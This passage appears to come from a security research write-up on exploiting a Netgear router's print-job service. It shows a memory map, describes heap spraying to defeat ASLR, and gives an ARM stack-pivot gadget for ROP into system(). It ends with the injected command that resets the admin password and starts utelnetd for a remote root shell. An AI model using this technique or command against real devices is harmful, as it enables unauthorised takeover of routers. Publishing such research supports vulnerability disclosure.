4002b000-4002c000 rw-p 00005000 1f:03 376        /lib/ld-uClibc.so.0
4002f000-40030000 rw-p 00000000 00:00 0
40154000-4015f000 r-xp 00000000 1f:03 265        /lib/libpthread.so.0       // ASLR
4015f000-40166000 ---p 00000000 00:00 0
40166000-40167000 r--p 0000a000 1f:03 265        /lib/libpthread.so.0
40167000-4016c000 rw-p 0000b000 1f:03 265        /lib/libpthread.so.0
4016c000-4016e000 rw-p 00000000 00:00 0
4016e000-401d3000 r-xp 00000000 1f:03 352        /lib/libc.so.0             // ASLR
401d3000-401db000 ---p 00000000 00:00 0
401db000-401dc000 r--p 00065000 1f:03 352        /lib/libc.so.0
401dc000-401dd000 rw-p 00066000 1f:03 352        /lib/libc.so.0
401dd000-401e2000 rw-p 00000000 00:00 0                                     // Broken ASLR
bcdfd000-bce00000 rwxp 00000000 00:00 0
bcffd000-bd000000 rwxp 00000000 00:00 0
bd1fd000-bd200000 rwxp 00000000 00:00 0
bd3fd000-bd400000 rwxp 00000000 00:00 0
bd5fd000-bd600000 rwxp 00000000 00:00 0
bd7fd000-bd800000 rwxp 00000000 00:00 0
bd9fd000-bda00000 rwxp 00000000 00:00 0
bdbfd000-bdc00000 rwxp 00000000 00:00 0
bddfd000-bde00000 rwxp 00000000 00:00 0
bdffd000-be000000 rwxp 00000000 00:00 0
be1fd000-be200000 rwxp 00000000 00:00 0
be3fd000-be400000 rwxp 00000000 00:00 0
beacc000-beaed000 rw-p 00000000 00:00 0          [stack]                    // ASLR

If it gets allocated in the lowest address 0x40100008, it will end at 0x41100008. It means we can spray pages of the same data and get deterministic content at a static address, e.g. 0x41000100.

Finally, looking at the Response_Get_Jobs function’s epilogue, we see POP {R11,PC} which means we can craft a fake R11 and use a gadget like the following to pivot our stack to a new stack where we have data we control to start doing Return Oriented Programming (ROP):

.text:000118A0                 LDR             R3, [R11,#-0x28]
.text:000118A4
.text:000118A4 loc_118A4                               ; Get_JobNode_Print_Job+7D8↑j
.text:000118A4                 MOV             R0, R3
.text:000118A8                 SUB             SP, R11, #4
.text:000118AC                 POP             {R11,PC}

So we can make R11 points to our static region 0x41000100 and also store the command to execute at a static address in that region. Then we use the above gadget to retrieve the address of that command (also stored in that region) in order to set the first argument of system() (in r0) and then pivot to a new stack to that region that will make it finally return to system("any command")

Obtaining a root shell

We decided to use the following command: "nvram set http_passwd=nccgroup && sleep 4 && utelnetd -d -i br0". This is very similar to the method that what was used in the Tokyo drift paper except that in our case we have more control since we are executing all the commands we want so we can set an arbitrary password as well as start the utelnetd process instead of just being able to reset the HTTP password to its default value.

Finally, we use the same trick as the Tokyo drift paper and login to the web interface to re-set the password to the same password, so utelnetd takes into account our new password and we get a remote shell on the Netgear router.

❌